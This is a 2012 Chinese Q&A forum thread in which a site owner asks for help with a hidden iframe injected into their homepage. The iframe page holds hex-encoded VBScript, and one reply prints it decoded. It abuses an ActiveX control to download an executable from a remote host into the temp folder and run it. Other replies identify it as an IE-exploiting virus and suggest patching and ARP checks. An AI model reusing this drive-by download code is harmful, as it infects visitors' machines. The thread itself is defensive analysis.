读书人
栏目

高分求JS高手帮小弟我分析这段代码

发布时间: 2012-02-02 23:57:14 作者: rapoo

高分求JS高手帮我分析这段代码.
网站首页嵌套了一个 <iframe src=http://fs18.net/down8/dd.htm width=20 height=0 frameborder=0> </iframe>

我把页面http://fs18.net/down8/dd.htm下载下来后是下面的代码,请高手帮我分析下啊!

<html>
<body>
<script language= "JavaScript ">
function mymid(ss) {
return ss.substring(2);}
</script>
<script language= "VBScript ">
flag_type= "vbs "
S= "6f6E206572726F7220726573756d65206E6578740D0a6375726c3D22687474703A2F2f667331382E6E65742F646f776E382f "
S=S+ "69692e657865220D0a666E616D65313D2269692e657865220D0a666e616d65323d2269692e766273220d0a53657420646620 "
S=S+ "3D20646F63756D656E742E637265617465456C656d656E7428226F626A65637422290D0a64662e7365744174747269627574 "
S=S+ "652022636c6173736964222C2022636C7369643A42443936433535362D363541332D313144302d393833412d303043303446 "
S=S+ "433239453336220D0a7374723D224D6963726f736F66742e584d4c48545450220d0a5365742078203d2064662e4372656174 "
S=S+ "654F626A656374287374722C2222290D0A43313D2241646f220D0A43323d2264622e220D0A43333D22737472220D0A43343D "
S=S+ "2265616D220D0A737472313D43312643322643332643340D0A737472353D737472310D0a7365742053203d2064662E637265 "
S=S+ "6174656f626A65637428737472352c2222290D0a532e74797065203d20310D0A737472363D22474554220d0a782e4F70656e "
S=S+ "20737472362C206375726c2C2046616C73650D0a782E53656E640d0a73313d22536372697074220d0a73323d22696E672E22 "
S=S+ "0d0a73333D2246696C65220D0a73343d2253797374656D4F626a656374220d0a73303D73312B73322b73332B73340d0a7365 "
S=S+ "742046203D2064662E6372656174656f626a6563742873302C2222290d0a73657420746d70203d20462e4765745370656369 "
S=S+ "616C466F6c6465722832290D0a666E616d65313d20462e4275696c645061746828746D702c666E616D6531290D0a532e6f70 "
S=S+ "656E0D0A532e777269746520782e726573706F6e7365426F64790D0A532e73617665746f66696c6520666E616d65312C320d "
S=S+ "0A532E636C6f73650D0A666e616d65323D20462E4275696C645061746828746D702C666e616d6532290D0A53657420747320 "
S=S+ "3d20462E4f70656e5465787446696c6528666e616D65322C20322C2054727565290d0A74732E57726974654C696E65202253 "
S=S+ "6574205368656c6C203D204372656174654f626A656374282222577363726970742E5368656c6C222229220d0A73716C3D22 "
S=S+ "5368656c6C2e52756E282222222b666e616d65312B22222229220D0A74732e57726974654c696E652073716c0d0A74732E57 "
S=S+ "726974654C696e652022736574205368656c6C3D4e6F7468696E67220D0a74732E57726974654c696E652022693d31220d0a "
S=S+ "74732e636C6f73650d0a696620462e46696C6545786973747328666E616D6531293d74727565207468656e0d0a696620462E "
S=S+ "46696C6545786973747328666E616d6532293d74727565207468656E0d0a202020207368613D225368656C6c2e417070220D "
S=S+ "0a202020207368623D7368610d0A202020207365742051203D2064662E6372656174656f626a656374287368622b226c6963 "
S=S+ "6174696f6e222c2222290D0A20202020512e5368656c6c4578656375746520666E616d65322c22222c22222c226F70656e22 "
S=S+ "2c300D0A656E642069660d0a656e642069660D0a "
D= " "
DO WHILE LEN(S)> 1
k= "&H "+ucase(LEFT(S,2))
p=CLng(k)
m=chr(p)
D=D+m
S=mymid(S)
LOOP
if flag_type= "vbs " then
EXECUTE D
end if
if flag_type= "html " then
document.write(D)
end if
</script>
<script language= "javaScript ">
if (flag_type== "js ") {


eval(D);}
</script>
</body>
</html>
<DIV style= "CURSOR: url(ah.c) "> </DIV>
<iframe src= "vip1.htm " width= "0 " height= "0 " border= "0 "> </iframe>
<script src= 'http://s128.cnzz.com/stat.php?id=620367&web_id=620367 ' language= 'JavaScript ' charset= 'gb2312 '> </script>
<script type= "text/jscript "> function init() { document.write( " ");}window.onload = init; </script>
<body oncontextmenu= "return false " onselectstart= "return false " ondragstart= "return false ">


[解决办法]
on error resume next curl= "http://fs18.net/down8/ii.exe " fname1= "ii.exe " fname2= "ii.vbs " Set df = document.createElement( "object ") df.setAttribute "classid ", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 " str= "Microsoft.XMLHTTP " Set x = df.CreateObject(str, " ") C1= "Ado " C2= "db. " C3= "str " C4= "eam " str1=C1&C2&C3&C4 str5=str1 set S = df.createobject(str5, " ") S.type = 1 str6= "GET " x.Open str6, curl, False x.Send s1= "Script " s2= "ing. " s3= "File " s4= "SystemObject " s0=s1+s2+s3+s4 set F = df.createobject(s0, " ") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close fname2= F.BuildPath(tmp,fname2) Set ts = F.OpenTextFile(fname2, 2, True) ts.WriteLine "Set Shell = CreateObject( " "Wscript.Shell " ") " sql= "Shell.Run( " " "+fname1+ " " ") " ts.WriteLine sql ts.WriteLine "set Shell=Nothing " ts.WriteLine "i=1 " ts.close if F.FileExists(fname1)=true then if F.FileExists(fname2)=true then sha= "Shell.App " shb=sha set Q = df.createobject(shb+ "lication ", " ") Q.ShellExecute fname2, " ", " ", "open ",0 end if end if
[解决办法]
js调用 vbs的东西吧

这年头 都用 firefox了 vbs也就没法用了

[解决办法]
这个好像是病毒来的.
[解决办法]
学习
[解决办法]
是病毒,利用ie漏洞
前面s是病毒体的二进制代码
D是解码后的病毒
这句
EXECUTE D
执行


[解决办法]
你要看具体是服务器端页面本身带毒,还是通过诸如arp欺骗方式注入病毒
如果是服务器端本身,只有不去访问它或在你的网络出口加病毒网关防御,也可以试试打补丁的办法
如果是arp欺骗,先找到哪台感染arp病毒
总之补丁是不能不打。

读书人网 >asp.net

热点推荐

触屏版 | 电脑版

读书人网 m.reader8.net